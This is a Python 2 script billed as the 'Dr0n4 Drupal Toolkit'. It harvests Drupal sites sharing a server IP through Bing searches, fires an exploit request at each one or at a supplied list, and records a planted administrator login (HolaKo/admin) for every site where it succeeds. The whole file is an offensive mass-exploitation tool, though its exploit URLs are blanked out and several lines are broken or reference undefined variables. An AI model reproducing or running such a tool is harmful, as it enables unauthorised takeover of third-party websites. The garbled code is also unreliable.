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- #!/usr/bin/python
- import urllib2,urllib,re,sys,json
- from urlparse import urlparse
- logo = '''
- ____ _____ _ _ _ _
- | _ \ _ __ ___ _ __ __ _ |_ _|__ ___ | | | _(_) |_
- | | | | '__/ _ \| '_ \ / _` | | |/ _ \ / _ \| | |/ / | __|
- | |_| | | | (_) | | | | (_| | | | (_) | (_) | | <| | |_
- |____/|_| \___/|_| |_|\__,_| |_|\___/ \___/|_|_|\_\_|\__|
- Coded by:- Cyb3r_h4ck3r (@itsmehulbhatt)
- '''
- menu ='''
- \t{1} Drupal Bing Exploiter
- \t{2} Get Drupal Websites
- \t{3} Drupal Mass Exploiter
- \t{4} About Me
- '''
- def about():
- print ("\n\t**************************************************");
- print ("\n\t* Dr0n4 Drupal Toolkit *");
- print ("\n\t* written By : Cyb3r_h4ck3r *");
- print ("\n\t* Shouts out to : Team IHC & Indian hackers *");
- print ("\n\t* Website :- *");
- print ("\n\t**************************************************");
- #Definition Of Drupal Bing Expoliter
- def drupal():
- '''Drupal Exploit Binger All Websites Of server '''
- ip = raw_input('1- IP : ')
- page = 1
- while page <= 50 :
- url = ""+ip+"&go=Valider&qs=n&form=QBRE&pq=ip%3A"+ip+"&sc=0-0&sp=-1&sk=&cvid=af529d7028ad43a69edc90dbecdeac4f&first="+str(page)
- req = urllib2.Request(url)
- opreq = urllib2.urlopen(req).read()
- findurl = re.findall('<div class="b_title"><h2><a href="(.*?)" h=',opreq)
- page += 1
- for url in findurl :
- try :
- urlpa = urlparse(url)
- site = urlpa.netloc
- print "[+] Testing At "+site
- resp = urllib2.urlopen(''+site+'&submit=submit')
- if "User : HolaKo" in read:
- print "Exploit found =>"+site
- print "user:HolaKo\npass:admin"
- a = open('up.txt','a')
- a.write(site+'\n')
- a.write("user:"+user+"\npass:"+pwd+"\n")
- else :
- print "[-] Expl Not Found :( "
- except Exception as ex :
- print ex
- sys.exit(0)
- #Drupal Server ExtraCtor
- def getdrupal():
- ip = raw_input('2- Ip : ')
- page = 1
- sites = list()
- while page <= 50 :
- url = ""+ip+"+node&go=Valider&qs=ds&form=QBRE&first="+str(page)
- req = urllib2.Request(url)
- opreq = urllib2.urlopen(req).read()
- findurl = re.findall('<div class="b_title"><h2><a href="(.*?)" h=',opreq)
- page += 1
- for url in findurl :
- split = urlparse(url)
- site = split.netloc
- if site not in sites :
- print site
- sites.append(site)
- #Drupal Mass List Exploiter
- def drupallist():
- listop = raw_input("Enter The list Txt :")
- fileopen = open(listop,'r')
- content = fileopen.readlines()
- for i in content :
- url=i.strip()
- try :
- openurl = urllib2.urlopen(''+url+'&submit=submit')
- readcontent =
- if "Success" in readcontent :
- print "[+]Success =>"+url
- print "[-]username:HolaKo\n[-]password:admin"
- save = open('drupal.txt','a')
- save.write(url+"\n"+"[-]username:HolaKo\n[-]password:admin\n")
- else :
- print i + "=> exploit not found "
- except Exception as ex :
- print ex
- def main():
- print logo
- print menu
- choose = raw_input("choose a number :")
- while True :
- if choose == "1":
- drupal()
- if choose == "2":
- getdrupal()
- if choose == "3":
- drupallist()
- if choose == "4":
- about()
- if choose == "11":
- print "#By"
- exit()
- con = raw_input('Continue [Y/n] -> ')
- if con[0].upper() == 'N' :
- exit()
- if con[0].upper() == 'Y' :
- main()
- if __name__ == '__main__':main()
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